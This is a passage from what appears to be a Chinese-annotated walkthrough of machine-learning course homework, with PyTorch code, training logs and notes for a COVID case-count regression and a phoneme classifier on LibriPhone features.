    def forward(self, x):
    '''
    定义了该自定义神经网络模型的前向传播方法,即输入数据 x 经过一系列层和激活函数的变换之后,最终输出预测结果。
    '''
    x = self.layers(x) # 表示将输入数据 x 输入到 self.layers 中,进行多层次的线性变换和非线性激活。
    # 表示对最终输出的张量进行压缩,将形状为(batch_size, 1)的张量压缩为形状为(batch_size,)的张量,方便后续处理和计算损失值
    x = x.squeeze(1) # (B, 1) -> (B)
    return x

    Feature Selection

    Choose features you deem useful by modifying the function below.

    通过修改下面的功能来选择您认为有用的功能。

    def select_feat(train_data, valid_data, test_data, select_all=True):
    '''
    定义了一个函数 select_feat,该函数接受三个张量类型的输入参数 train_data、valid_data 和 test_data,
    分别表示训练数据集、验证数据集和测试数据集。
    另外,该函数还包含一个可选参数 select_all,默认为 True,表示是否选择全部特征列。
    '''
    '''Selects useful features to perform regression'''
    y_train, y_valid = train_data[:,-1], valid_data[:,-1] # 将原始的训练数据集和验证数据集中的标签列(最后一列)提取出来,分别赋值给变量 y_train 和 y_valid,用于后续的回归分析。
    '''
    将原始的训练数据集、验证数据集和测试数据集中除标签列之外的所有列提取出来,
    分别赋值给变量 raw_x_train、raw_x_valid 和 raw_x_test,用于后续的特征选择。
    '''
    raw_x_train, raw_x_valid, raw_x_test = train_data[:,:-1], valid_data[:,:-1], test_data

    if select_all:
    feat_idx = list(range(raw_x_train.shape[1])) # 将所有原始特征列的索引放入一个列表中,并赋值给变量 feat_idx
    else:
    feat_idx = [0,1,2,3,4] # TODO: Select suitable feature columns. 选择适当的特征列
    '''
    返回特征选择后的训练数据、验证数据和测试数据。
    其中,raw_x_train[:,feat_idx]表示从训练数据集中选择指定的特征列,
    raw_x_valid[:,feat_idx]表示从验证数据集中选择指定的特征列,
    raw_x_test[:,feat_idx]表示从测试数据集中选择指定的特征列,
    最后两个参数 y_train 和 y_valid 表示训练数据集和验证数据集的标签列。
    '''
    return raw_x_train[:,feat_idx], raw_x_valid[:,feat_idx], raw_x_test[:,feat_idx], y_train, y_valid

    Training Loop

    def trainer(train_loader, valid_loader, model, config, device):
    # 定义了一个均方误差损失函数 MSELoss,用于计算模型预测结果和真实标签之间的差异。
    criterion = nn.MSELoss(reduction='mean') # Define your loss function, do not modify this.

    # Define your optimization algorithm. 定义你自己的优化函数
    # TODO: Please check https://pytorch.org/docs/stable/optim.html to get more available algorithms.
    # TODO: L2 regularization (optimizer(weight decay...) or implement by your self). L2 正则化(优化器(权重衰减…)或自行实现)。
    '''
    定义了一个随机梯度下降(SGD)优化器,用于优化模型的参数。
    其中,model.parameters()表示需要优化的模型参数,
    lr=config['learning_rate']表示学习率,
    momentum=0.7 表示使用动量法进行优化。
    '''
    optimizer = torch.optim.SGD(model.parameters(), lr=config['learning_rate'], momentum=0.7)
    writer = SummaryWriter() # Writer of tensoboard. 创建了一个 SummaryWriter 对象,用于将训练过程中的监控指标写入 tensorboard 日志文件。

    if not os.path.isdir('./models'):
    os.mkdir('./models') # Create directory of saving models. 创建一个文件夹以保存模型
    # 设置了几个变量,包括训练轮数 n_epochs、最佳损失值 best_loss、当前训练步数 step 和早停计数器 early_stop_count
    n_epochs, best_loss, step, early_stop_count = config['n_epochs'], math.inf, 0, 0

    for epoch in range(n_epochs): # 开始迭代训练,共进行 n_epochs 轮训练。
    model.train() # Set your model to train mode. 将模型切换为训练模式。
    loss_record = [] # 新建一个列表以存储每一个 epoch 损失函数的值。

    # tqdm is a package to visualize your training progress. 使用 tqdm 库创建一个进度条,用于可视化训练进度。
    train_pbar = tqdm(train_loader, position=0, leave=True)

    for x, y in train_pbar: # 开始迭代训练集,依次提取出输入特征 x 和标签 y。
    optimizer.zero_grad() # Set gradient to zero. 清零梯度,避免上一次的梯度对本次梯度的影响。
    x, y = x.to(device), y.to(device) # Move your data to device. 将输入特征 x 和标签 y 复制到 GPU 设备上进行加速计算。
    pred = model(x) # 将输入特征 x 输入到模型中,得到预测结果 pred。
    loss = criterion(pred, y) # 计算预测结果 pred 和真实标签 y 之间的误差,即损失函数值。
    loss.backward() # Compute gradient(backpropagation). 自动计算损失函数对各个参数的梯度。
    optimizer.step() # Update parameters. 通过优化器更新模型参数。
    step += 1
    loss_record.append(loss.detach().item()) # 将每一批次的损失函数值记录下来。

    # Display current epoch number and loss on tqdm progress bar.
    train_pbar.set_description(f'Epoch [{epoch+1}/{n_epochs}]') # 在进度条中显示当前轮数和总轮数。
    train_pbar.set_postfix({'loss': loss.detach().item()}) # 在进度条中显示当前批次的损失函数值。

    mean_train_loss = sum(loss_record)/len(loss_record) # 计算当前轮训练集的平均损失函数值。
    writer.add_scalar('Loss/train', mean_train_loss, step) # 将训练集的平均损失函数值写入 tensorboard 日志文件。

    model.eval() # Set your model to evaluation mode. 将模型切换为评估模式,用于对验证集进行预测和评估。
    loss_record = [] # 新建一个列表以存储每一个 epoch 损失函数的值。
    for x, y in valid_loader: # 开始迭代验证集,依次提取出输入特征 x 和标签 y。
    x, y = x.to(device), y.to(device) # 将输入特征 x 和标签 y 复制到 GPU 设备上进行加速计算。
    with torch.no_grad(): # 评估验证集的时候不改变模型参数,关闭梯度
    pred = model(x) # 将输入特征 x 输入到模型中,得到预测结果 pred。
    loss = criterion(pred, y) # 计算预测结果 pred 和真实标签 y 之间的误差,即损失函数值。

    loss_record.append(loss.item()) # 将每一批次的损失函数值记录下来。

    mean_valid_loss = sum(loss_record)/len(loss_record) # 计算当前轮验证集的平均损失函数值。
    # 打印当前轮的训练集和验证集的平均损失函数值。
    print(f'Epoch [{epoch+1}/{n_epochs}]: Train loss: {mean_train_loss:.4f}, Valid loss: {mean_valid_loss:.4f}')
    # writer.add_scalar('Loss/valid', mean_valid_loss, step)

    if mean_valid_loss < best_loss:
    '''
    如果当前轮的验证集平均损失函数值优于历史最佳值,则更新最佳损失值和最佳模型参数,并将模型保存到指定路径
    '''
    best_loss = mean_valid_loss
    torch.save(model.state_dict(), config['save_path']) # Save your best model
    print('Saving model with loss {:.3f}...'.format(best_loss))
    early_stop_count = 0
    else: # 如果当前轮的验证集平均损失函数值没有优于历史最佳值,则早停计数器加 1
    early_stop_count += 1

    if early_stop_count >= config['early_stop']: # 如果早停计数器超过早停阈值,则停止训练并返回
    print('\nModel is not improving, so we halt the training session.')
    return

    Configurations

    config contains hyper-parameters for training and the path to save your model.

    config 包含用于训练的超参数和保存模型的路径。

    device = 'cuda' if torch.cuda.is_available() else 'cpu'
    config = {
    'seed': 5201314, # Your seed number, you can pick your lucky number. :)
    'select_all': True, # Whether to use all features.
    'valid_ratio': 0.2, # validation_size = train_size * valid_ratio
    'n_epochs': 5000, # Number of epochs.
    'batch_size': 256,
    'learning_rate': 1e-5,
    'early_stop': 600, # If model has not improved for this many consecutive epochs, stop training. 若模型在这么多连续的时期内并没有得到改善,就停止训练。
    'save_path': './models/model.ckpt' # Your model will be saved here.
    }

    Dataloader

    Read data from files and set up training, validation, and testing sets. You do not need to modify this part.

    从文件中读取数据,并设置培训、验证和测试集。您不需要修改此部件。

    same_seed(config['seed'])  # 设置随机数种子,保证每次训练的结果可复现。
    # 从指定文件路径读取训练集和测试集数据,并将其转换成 numpy 数组的形式。
    train_data, test_data = pd.read_csv('./covid_train.csv').values, pd.read_csv('./covid_test.csv').values
    # 将训练集拆分为新的训练集和验证集,其中 train_valid_split()函数接受三个参数:原始训练集、验证集比例和随机数种子。
    train_data, valid_data = train_valid_split(train_data, config['valid_ratio'], config['seed'])

    # Print out the data size. 打印出训练集、验证集和测试集的大小。
    print(f"""train_data size: {train_data.shape}
    valid_data size: {valid_data.shape}
    test_data size: {test_data.shape}""")

    ## Select features
    '''
    选择特征,其中 select_feat()函数接受四个参数:
    训练集、验证集、测试集和是否选择所有特征(如果是,则选择所有特征;如果否,则根据一定规则筛选特征)。
    '''
    x_train, x_valid, x_test, y_train, y_valid = select_feat(train_data, valid_data, test_data, config['select_all'])

    # Print out the number of features.
    # 打印出特征数量。
    print(f'number of features: {x_train.shape[1]}')

    # 创建训练集、验证集和测试集的数据集。
    train_dataset, valid_dataset, test_dataset = COVID19Dataset(x_train, y_train), \
    COVID19Dataset(x_valid, y_valid), \
    COVID19Dataset(x_test)

    # Pytorch data loader loads pytorch dataset into batches.
    '''
    使用 PyTorch 提供的 DataLoader 将训练集数据集加载到内存中,并设置每个 batch 的大小、是否打乱顺序以及是否将数据存储在 GPU 显存中。
    同样,valid_loader 和 test_loader 也是通过 DataLoader 加载验证集和测试集数据集。
    '''
    train_loader = DataLoader(train_dataset, batch_size=config['batch_size'], shuffle=True, pin_memory=True)
    valid_loader = DataLoader(valid_dataset, batch_size=config['batch_size'], shuffle=True, pin_memory=True)
    test_loader = DataLoader(test_dataset, batch_size=config['batch_size'], shuffle=False, pin_memory=True)
    train_data size: (2408, 89) valid_data size: (601, 89) test_data size: (997, 88)number of features: 88

    Start training!

    model = My_Model(input_dim=x_train.shape[1]).to(device) # put your model and data on the same computation device.
    trainer(train_loader, valid_loader, model, config, device)
    Epoch [1/5000]: 100%|██████████| 10/10 [00:03<00:00,  3.26it/s, loss=131]Epoch [1/5000]: Train loss: 263.8631, Valid loss: 94.9638Saving model with loss 94.964...

    ……

    Epoch [998/5000]: Train loss: 3.8978, Valid loss: 6.7839Epoch [999/5000]: 100%|██████████| 10/10 [00:00<00:00, 135.57it/s, loss=2.35]

    Plot learning curves with tensorboard (optional)

    tensorboard is a tool that allows you to visualize your training progress.

    If this block does not display your learning curve, please wait for few minutes, and re-run this block. It might take some time to load your logging information.

    tensorboard 是一个工具,可以让你可视化你的训练进度。
    如果此块没有显示您的学习曲线,请等待几分钟,然后重新运行此块。加载日志信息可能需要一些时间。

    %reload_ext tensorboard
    %tensorboard --logdir=./runs/

    Testing

    The predictions of your model on testing set will be stored at pred.csv.

    您的模型在测试集上的预测将存储在 pred.csv 中。

    def save_pred(preds, file):
    '''
    Save predictions to specified file
    自定义函数 save_pred(),接受两个参数:预测结果和指定的文件路径。
    '''
    with open(file, 'w') as fp: # 使用指定的路径打开文件,以写入的模式打开('w')。
    writer = csv.writer(fp) # 使用 Python 标准库 csv 中的 writer()方法创建一个写入器
    writer.writerow(['id', 'tested_positive']) # 写入文件头。
    for i, p in enumerate(preds): # 循环遍历预测结果,并将每个样本的 ID 和预测值写入文件中。
    writer.writerow([i, p])

    model = My_Model(input_dim=x_train.shape[1]).to(device) # 创建一个名为 My_Model 的模型,其中 input_dim 是输入数据的特征维度。
    model.load_state_dict(torch.load(config['save_path'])) # 利用 PyTorch 提供的 load_state_dict()方法加载训练好的模型参数。
    preds = predict(test_loader, model, device) # 使用定义好的 predict()函数对测试集进行预测,其中 predict()函数接受三个参数:测试集的数据加载器、模型以及设备类型。
    save_pred(preds, 'pred.csv') # 将预测结果保存到指定文件中。

    Download

    Run this block to download the pred.csv automatically.

    from google.colab import files
    files.download('pred.csv')

    Reference

    This notebook uses code written by Heng-Jui Chang @ NTUEE (https://github.com/ga642381/ML2021-Spring/blob/main/HW01/HW01.ipynb)

    Homework 2: Phoneme Classification

    Task Description

    • Phoneme Classification
      • 音素分类
    • Training data: 3429 preprocessed audio features w/ labels (total 2116794 frames)
      • 训练数据:3429 个带标签的预处理音频特征(共 2116794 帧)
    • Testing data: 857 preprocessed audio features w/o labels (total 527364 frames)
      • 测试数据:857 个带标签(共 527364 帧)的预处理语音特征
    • Label: 41 classes, each class represents a phoneme
      • 标签:41 个类,每个类代表一个音素

    Objectives:

    • Solve a classification problem with deep neural networks (DNNs).
      • 使用 DNN 解决分类问题
    • Understand recursive neural networks (RNNs).

    Some Utility Functions

    Fixes random number generator seeds for reproducibility.

    固定随机数生成器种子以获得再现性。

    import numpy as np
    import torch
    import random

    def same_seeds(seed):
    random.seed(seed)
    np.random.seed(seed)
    torch.manual_seed(seed)
    if torch.cuda.is_available():
    torch.cuda.manual_seed(seed)
    torch.cuda.manual_seed_all(seed)
    torch.backends.cudnn.benchmark = False # 将 CuDNN 的随机性设置为确定性模式,这是为了确保每次运行时 CuDNN 生成的随机数列是一样的。
    torch.backends.cudnn.deterministic = True # 禁用 CuDNN 的自动调整功能,避免出现由于 CuDNN 自动调整导致的运行时间不稳定的情况。

    Helper functions to pre-process the training data from raw MFCC features of each utterance.

    辅助函数用于预处理来自每个话语的原始 MFCC 特征的训练数据。

    A phoneme may span several frames and is dependent to past and future frames.
    Hence we concatenate neighboring phonemes for training to achieve higher accuracy. The concat_feat function concatenates past and future k frames (total 2k+1 = n frames), and we predict the center frame.

    一个音素可能跨越几个帧,并依赖于过去和未来的帧。
    因此,我们将相邻的音素连接起来进行训练,以获得更高的精度。concat_filt函数连接过去和未来的 k 帧(总共 2k+1=n 帧),我们预测中心帧。

    Feel free to modify the data preprocess functions, but do not drop any frame (if you modify the functions, remember to check that the number of frames are the same as mentioned in the slides)

    可以随意修改数据预处理函数,但不要丢弃任何帧(如果修改函数,请记住检查帧数是否与幻灯片中提到的相同)

    import os
    import torch
    from tqdm import tqdm

    def load_feat(path):
    feat = torch.load(path) # 用于加载已保存模型的函数。该函数接受一个文件路径参数,返回包含模型参数的 Python 字典对象。
    return feat

    def shift(x, n):
    '''
    shift 函数用来实现对一个一维或二维的 Tensor x 进行循环移位操作。其中,移位的距离为整数值 n,可以为正、负、零。

    repeat() 函数是用来对一个序列进行重复的函数,即将原序列中的元素按照指定次数进行重复。
    具体而言,对于一个具有 n 个元素的序列 x,
    调用 x.repeat(m) 函数可以得到一个新的序列,其中包含原序列 x 中的所有元素,每个元素均重复 m 次。
    例如,对于 [1, 2, 3] 序列执行 repeat(3) 操作后得到的序列为 [1, 2, 3, 1, 2, 3, 1, 2, 3]。
    '''
    if n < 0:
    '''
    如果 n < 0,表示向左移动,
    此时函数会将 x 最左侧的 n 个元素复制到 x 的最右侧,
    同时将 x 原来的前 n 个元素截取出来放到 x 的末尾;
    '''
    left = x[0].repeat(-n, 1)
    right = x[:n]
    elif n > 0:
    '''
    如果 n > 0,表示向右移动,
    此时函数会将 x 最右侧的 n 个元素复制到 x 的最左侧,
    同时将 x 原来的后 n 个元素截取出来放到 x 的开头;
    '''
    right = x[-1].repeat(n, 1)
    left = x[n:]
    else:
    '''
    如果 n = 0,表示不需要移位,直接返回原始的 x。
    '''
    return x
    # 使用 torch.cat() 函数将左右两个部分进行拼接,其中 dim=0 表示在第 0 维(即在行方向上)进行拼接。最后返回拼接后的结果。
    return torch.cat((left, right), dim=0)

    def concat_feat(x, concat_n):
    '''
    将输入的张量 x 沿着第 0 维进行拼接。
    具体而言,将原始的 seq_len x feature_dim 的二维张量,复制 concat_n 次后变为 seq_len x (concat_n*feature_dim) 的形状。
    将一个二维张量沿着第 0 维进行拼接,并实现了一些操作来保证拼接后的结果具有一定的对称性和规律性。
    '''
    # assert 语句会在程序中检查某个条件是否成立,如果不成立,就会抛出一个 AssertionError 异常,并给出错误信息。
    assert concat_n % 2 == 1 # n must be odd 对输入的 concat_n 进行判断,确保其为奇数
    if concat_n < 2: # 如果 concat_n 小于 2,则直接返回原始的张量 x。
    return x
    seq_len, feature_dim = x.size(0), x.size(1) # 对输入的张量获取其 seq_len 和 feature_dim(即第 0 维和第 1 维的大小)
    x = x.repeat(1, concat_n) # 使用 repeat() 函数将输入张量在第 1 维上重复 concat_n 次,得到一个新的形状为 seq_len x (concat_n * feature_dim) 的张量
    '''
    使用 view() 函数将张量重新变形,
    使得第 1 维大小为 concat_n,
    第 2 维大小为 seq_len,
    第 3 维大小为 feature_dim。
    然后使用 permute() 函数交换各维度的位置,使得张量的形状变为 (concat_n, seq_len, feature_dim)。
    '''
    x = x.view(seq_len, concat_n, feature_dim).permute(1, 0, 2) # concat_n, seq_len, feature_dim
    '''
    找到张量中心位置 mid = (concat_n // 2),并对从 mid+1 到最后的行进行循环,对这些行进行移位操作。
    具体来说,对于每一行,将其向右移动 r_idx 个位置,再将移位后的结果放到对称位置上。
    '''
    mid = (concat_n // 2)
    for r_idx in range(1, mid+1):
    x[mid + r_idx, :] = shift(x[mid + r_idx], r_idx)
    x[mid - r_idx, :] = shift(x[mid - r_idx], -r_idx)
    # 使用 permute() 和 view() 函数将张量恢复到 seq_len x (concat_n*feature_dim) 的形状,并返回拼接后的张量
    return x.permute(1, 0, 2).view(seq_len, concat_n * feature_dim)

    def preprocess_data(split, feat_dir, phone_path, concat_nframes, train_ratio=0.8):
    '''
    用于对数据集进行预处理。
    split: 数据集的划分,可选值为 'train'、'val' 和 'test'。
    feat_dir: 特征文件所在的目录。
    phone_path: 声音标签文件所在的目录。
    concat_nframes: 需要拼接的帧数。
    train_ratio: 训练集和验证集的划分比例,缺省值为 0.8。
    '''
    class_num = 41 # NOTE: pre-computed, should not need change 设置音素总数 class_num(注意,此处的值是预先计算好的,不需要更改)。

    # 根据 split 参数判断数据集模式 mode,如果是 'train' 或 'val',就设置为 'train',否则设置为 'test'。
    if split == 'train' or split == 'val':
    mode = 'train'
    elif split == 'test':
    mode = 'test'
    else:
    raise ValueError('Invalid \'split\' argument for dataset: PhoneDataset!')

    label_dict = {}
    if mode == 'train': # 如果是训练模式
    # 从标签文件中读取标签信息到字典 label_dict 中
    for line in open(os.path.join(phone_path, f'{mode}_labels.txt')).readlines():
    line = line.strip('\n').split(' ')
    label_dict[line[0]] = [int(p) for p in line[1:]]

    # split training and validation data
    # 从训练集划分文件中读取训练集和验证集的使用情况,并按照参数 train_ratio 进行划分。
    usage_list = open(os.path.join(phone_path, 'train_split.txt')).readlines()
    random.shuffle(usage_list)
    train_len = int(len(usage_list) * train_ratio)
    usage_list = usage_list[:train_len] if split == 'train' else usage_list[train_len:]

    elif mode == 'test':
    usage_list = open(os.path.join(phone_path, 'test_split.txt')).readlines()

    # 从数据划分文件中读取使用的文件名列表到 usage_list 中,然后将其格式化为标准格式(去除换行符)
    usage_list = [line.strip('\n') for line in usage_list]
    # 打印有关数据集的信息,包括电话类别总数和数据集划分情况。
    print('[Dataset] - # phone classes: ' + str(class_num) + ', number of utterances for ' + split + ': ' + str(len(usage_list)))

    # 初始化张量 X 和 y(仅在训练模式下)
    max_len = 3000000
    X = torch.empty(max_len, 39 * concat_nframes)
    if mode == 'train':
    y = torch.empty(max_len, dtype=torch.long)

    # 按顺序读入特征文件中的信息到 X 中,同时将标签信息读入到 y 中。
    idx = 0
    for i, fname in tqdm(enumerate(usage_list)):
    feat = load_feat(os.path.join(feat_dir, mode, f'{fname}.pt'))
    cur_len = len(feat)
    feat = concat_feat(feat, concat_nframes)
    if mode == 'train':
    label = torch.LongTensor(label_dict[fname])

    X[idx: idx + cur_len, :] = feat
    if mode == 'train':
    y[idx: idx + cur_len] = label

    idx += cur_len

    # 去掉张量 X 和 y 中多余的部分(即在初始化时申请的空间)
    X = X[:idx, :]
    if mode == 'train':
    y = y[:idx]

    print(f'[INFO] {split} set')
    print(X.shape)
    # 返回处理后的张量 X(和可选的张量 y)
    if mode == 'train':
    print(y.shape)
    return X, y
    else:
    return X

    Dataset

    import torch
    from torch.utils.data import Dataset

    class LibriDataset(Dataset):
    def __init__(self, X, y=None):
    self.data = X
    if y is not None:
    self.label = torch.LongTensor(y)
    else:
    self.label = None

    def __getitem__(self, idx):
    if self.label is not None:
    return self.data[idx], self.label[idx]
    else:
    return self.data[idx]

    def __len__(self):
    return len(self.data)

    Model

    Feel free to modify the structure of the model.

    请随意修改模型的结构。

    import torch.nn as nn

    class BasicBlock(nn.Module):
    def __init__(self, input_dim, output_dim):
    super(BasicBlock, self).__init__()
    '''
    BasicBlock 是一个基本的神经网络模块,包含一个全连接层和一个 ReLU 激活层。
    输入向量的维度是 input_dim,输出向量的维度是 output_dim
    '''
    self.block = nn.Sequential(
    nn.Linear(input_dim, output_dim),
    nn.ReLU(),
    )

    def forward(self, x):
    x = self.block(x)
    return x


    class Classifier(nn.Module):
    '''
    定义了一个名为 Classifier 的神经网络模型,包含几个 BasicBlock 模块。
    '''
    def __init__(self, input_dim, output_dim=41, hidden_layers=1, hidden_dim=256):
    '''
    input_dim: 输入向量的维度。
    output_dim: 输出向量的维度,即分类类别总数,默认为 41。
    hidden_layers: 隐藏层的数量,缺省值为 1。
    hidden_dim: 隐藏层的神经元数。
    '''
    super(Classifier, self).__init__()

    self.fc = nn.Sequential(
    # 首先通过一个 BasicBlock 将样本输入从 input_dim 维度降到 hidden_dim 维度
    BasicBlock(input_dim, hidden_dim),
    # 通过一个 for 循环堆叠多个 BasicBlock 来增加模型深度和表达能力
    *[BasicBlock(hidden_dim, hidden_dim) for _ in range(hidden_layers)],
    # 通过一个全连接层将输出映射到 output_dim 维度上,完成整个分类任务。
    nn.Linear(hidden_dim, output_dim)
    )

    def forward(self, x):
    x = self.fc(x)
    return x

    Hyper-parameters

    # data prarameters 数据参数
    # 要连接的帧数,n 必须是奇数(总共 2k+1=n 帧)
    concat_nframes = 3 # the number of frames to concat with, n must be odd (total 2k+1 = n frames)
    # 用于训练的数据比例,其余数据将用于验证
    train_ratio = 0.75 # the ratio of data used for training, the rest will be used for validation

    # training parameters 训练参数
    seed = 1213 # random seed 随机数种子
    batch_size = 512 # batch size 批大小
    num_epoch = 10 # the number of training epoch,epoch 次数
    learning_rate = 1e-4 # learning rate 学习率
    model_path = './model.ckpt' # the path where the checkpoint will be saved 检查点保存位置

    # model parameters 模型参数
    # 模型的输入维数,不应更改该值
    input_dim = 39 * concat_nframes # the input dim of the model, you should not change the value
    # 隐藏层数
    hidden_layers = 2 # the number of hidden layers
    # 隐藏层维数
    hidden_dim = 64 # the hidden dim

    Dataloader

    from torch.utils.data import DataLoader
    import gc # 导入 gc 模块,用于进行垃圾回收操作

    same_seeds(seed) # 设置了随机数的种子
    # 根据是否有 GPU 加速设备来确定程序的运行设备
    device = 'cuda' if torch.cuda.is_available() else 'cpu'
    print(f'DEVICE: {device}')

    # preprocess data
    # 通过 preprocess_data() 函数对训练数据和验证数据进行预处理,并将其存储到 train_X、train_y、val_X 和 val_y 这四个变量中
    train_X, train_y = preprocess_data(split='train',
    # 语音特征文件所在目录的路径
    feat_dir='/kaggle/input/ml2023spring-hw2/libriphone/feat',
    # 语音标签文件所在的路径
    phone_path='/kaggle/input/ml2023spring-hw2/libriphone',
    # 将前后几帧的音频特征拼接成新的特征向量
    concat_nframes=concat_nframes,
    # 训练集和验证集的划分比例
    train_ratio=train_ratio)
    val_X, val_y = preprocess_data(split='val',
    feat_dir='/kaggle/input/ml2023spring-hw2/libriphone/feat',
    phone_path='/kaggle/input/ml2023spring-hw2/libriphone',
    concat_nframes=concat_nframes,
    train_ratio=train_ratio)

    ## get dataset
    '''
    使用数据集的类 LibriDataset 对每个数据集进行实例化,
    传入训练集和验证集的 X 和 y(即上一步中得到的 train_X, train_y 和 val_X, val_y),
    并将其赋值给 train_set 和 val_set 变量。
    '''
    train_set = LibriDataset(train_X, train_y)
    val_set = LibriDataset(val_X, val_y)

    # remove raw feature to save memory
    del train_X, train_y, val_X, val_y # 为了释放内存,删除 train_X, train_y, val_X 和 val_y 这四个变量
    gc.collect() # 用 gc.collect() 释放所有未引用的内存

    ## get dataloader
    '''
    使用 DataLoader 类为训练集和验证集创建 DataLoader 实例,
    指定批次大小 batch_size 和是否需要打乱数据 shuffle,
    并将其赋值给 train_loader 和 val_loader 变量,以供模型训练时使用
    '''
    train_loader = DataLoader(train_set, batch_size=batch_size, shuffle=True)
    val_loader = DataLoader(val_set, batch_size=batch_size, shuffle=False)
    DEVICE: cuda[Dataset] - # phone classes: 41, number of utterances for train: 25712571it [00:23, 107.38it/s][INFO] train settorch.Size([1588590, 117])torch.Size([1588590])[Dataset] - # phone classes: 41, number of utterances for val: 858858it [00:02, 308.31it/s][INFO] val settorch.Size([525078, 117])torch.Size([525078])

    Training

    # create model, define a loss function, and optimizer
    '''
    创建了一个用于分类的模型实例,
    这里使用了 Classifier 类,指定了输入数据的维度 input_dim、隐藏层的数量 hidden_layers 和每个隐藏层的维度 hidden_dim。
    并将其移动到之前确定的设备中。
    '''
    model = Classifier(input_dim=input_dim, hidden_layers=hidden_layers, hidden_dim=hidden_dim).to(device)
    # 定义交叉熵损失函数 nn.CrossEntropyLoss()
    criterion = nn.CrossEntropyLoss()
    # 优化器 Adam,将模型的参数传入优化器中,以便进行反向传播来更新权重。
    optimizer = torch.optim.Adam(model.parameters(), lr=learning_rate)

    best_acc = 0.0
    for epoch in range(num_epoch): # 开始对模型进行训练,循环执行 num_epoch 次
    # 在每次循环的时候,将 train_acc 和 train_loss、val_acc 和 val_loss 分别初始化为 0
    train_acc = 0.0
    train_loss = 0.0
    val_acc = 0.0
    val_loss = 0.0

    # training 将模型设为“训练模式”
    model.train() # set the model to training mode
    for i, batch in enumerate(tqdm(train_loader)): # 对 train_loader 中的每个 batch 进行循环操作
    # 在每个 batch 中,将 features 和 labels 数据移动到之前设置的设备上(即 device)
    features, labels = batch
    features = features.to(device)
    labels = labels.to(device)

    # 将模型中的梯度设置为 0
    optimizer.zero_grad()
    # 使用模型对 features 进行前向传播,得到预测结果 outputs
    outputs = model(features)

    # 计算损失值 loss
    loss = criterion(outputs, labels)
    # 通过反向传播计算出梯度
    loss.backward()
    # 更新模型参数
    optimizer.step()

    # 获取预测结果中的最大值
    _, train_pred = torch.max(outputs, 1) # get the index of the class with the highest probability
    # 将其与标签进行比较,得到得到 train_acc 的值
    '''
    train_pred 是模型在训练集上的预测结果,labels 是该 batch 中样本的标签。
    train_pred.detach() 和 labels.detach() 是为了防止其梯度反向传播而被计算的前后关联(detach 方法是将一个 tensor 从计算图中分离出来,不再参与自动求导)。
    通过 train_pred.detach() == labels.detach() 的判断,得到一个 boolean 类型的 Tensor,表示模型预测结果是否正确。
    接着对这个 Tensor 进行 sum() 操作,计算其中 True 的元素个数,即预测正确的样本数。
    最后使用 item() 方法将结果作为 Python 的 float 类型,累加到 train_acc 变量中。
    '''
    train_acc += (train_pred.detach() == labels.detach()).sum().item()
    # 将损失值加入 train_loss 中
    train_loss += loss.item()

    # validation
    model.eval() # set the model to evaluation mode 将模型设为“评估模式”
    with torch.no_grad():
    for i, batch in enumerate(tqdm(val_loader)): # 对 val_loader 中的每个 batch 进行循环操作
    features, labels = batch
    features = features.to(device)
    labels = labels.to(device)
    outputs = model(features) # 调用模型进行前向计算

    loss = criterion(outputs, labels) # 计算 loss 损失值

    _, val_pred = torch.max(outputs, 1)
    # 计算出预测准确率 val_acc 和 val_loss
    val_acc += (val_pred.cpu() == labels.cpu()).sum().item() # get the index of the class with the highest probability
    val_loss += loss.item()
    # 在每个 epoch 结束后,计算出 train_acc、train_loss、val_acc 和 val_loss 的平均值,并将其输出以监控训练过程
    print(f'[{epoch+1:03d}/{num_epoch:03d}] Train Acc: {train_acc/len(train_set):3.5f} Loss: {train_loss/len(train_loader):3.5f} | Val Acc: {val_acc/len(val_set):3.5f} loss: {val_loss/len(val_loader):3.5f}')

    # if the model improves, save a checkpoint at this epoch
    """
    如果当前模型的验证准确率 val_acc 超过了之前的最佳准确率 best_acc,
    则将 best_acc 更新为当前的 val_acc 值,
    将模型的参数保存到指定文件名的模型路径 model_path 中,
    并输出日志记录保存的模型及其准确率值。
    """
    if val_acc > best_acc:
    best_acc = val_acc
    torch.save(model.state_dict(), model_path)
    print(f'saving model with acc {best_acc/len(val_set):.5f}')

    100%|██████████| 3103/3103 [00:19<00:00, 156.88it/s]100%|██████████| 1026/1026 [00:03<00:00, 273.11it/s][001/010] Train Acc: 0.39279Loss: 2.21685 | Val Acc: 0.43877 loss: 1.97101saving model with acc 0.43877100%|██████████| 3103/3103 [00:17<00:00, 175.27it/s]100%|██████████| 1026/1026 [00:03<00:00, 277.94it/s]

    ……

    [009/010] Train Acc: 0.49606Loss: 1.72781 | Val Acc: 0.49852 loss: 1.71150saving model with acc 0.49852100%|██████████| 3103/3103 [00:17<00:00, 180.14it/s]100%|██████████| 1026/1026 [00:04<00:00, 241.12it/s][010/010] Train Acc: 0.49840Loss: 1.71736 | Val Acc: 0.50044 loss: 1.70057saving model with acc 0.50044


    del train_set, val_set
    del train_loader, val_loader
    gc.collect()
    23

    Testing

    Create a testing dataset, and load model from the saved checkpoint.

    # load data
    test_X = preprocess_data(split='test', feat_dir='/kaggle/input/ml2023spring-hw2/libriphone/feat', phone_path='/kaggle/input/ml2023spring-hw2/libriphone', concat_nframes=concat_nframes)
    test_set = LibriDataset(test_X, None)
    test_loader = DataLoader(test_set, batch_size=batch_size, shuffle=False)
    [Dataset] - # phone classes: 41, number of utterances for test: 857857it [00:08, 103.10it/s][INFO] test settorch.Size([527364, 117])


    ## load model
    model = Classifier(input_dim=input_dim, hidden_layers=hidden_layers, hidden_dim=hidden_dim).to(device)
    model.load_state_dict(torch.load(model_path))
    <All keys matched successfully>

    Make prediction.

    pred = np.array([], dtype=np.int32)  # 创建一个空的 numpy 数组 pred,其数据类型为 np.int32

    model.eval() # 将模型设置为“评估模式”
    with torch.no_grad(): # 使用 with torch.no_grad() 上下文管理器,以避免在评估模式下无意中修改了梯度。
    for i, batch in enumerate(tqdm(test_loader)): # 在 test_loader 上进行循环操作,每次从中取出一个 batch,并将其转换到指定的设备 device 上
    # 使用模型对 features 进行前向传播,得到预测结果 outputs
    features = batch
    features = features.to(device)

    outputs = model(features)

    # 通过 torch.max(outputs, 1) 可以得到每个样本在每个类别上的分数,
    # _ 表示分数张量,test_pred 是在第 1 维度(即类别)上具有最大值的索引,代表模型预测的类别
    _, test_pred = torch.max(outputs, 1) # get the index of the class with the highest probability
    # 将 test_pred 转回 numpy 数组,并使用 np.concatenate() 方法将其与之前的 pred 数组进行拼接,生成更新后的预测结果
    pred = np.concatenate((pred, test_pred.cpu().numpy()), axis=0)
    # 最终,当所有测试集的样本都被预测完毕后,pred 数组中将保存模型在测试集上的所有预测结果。
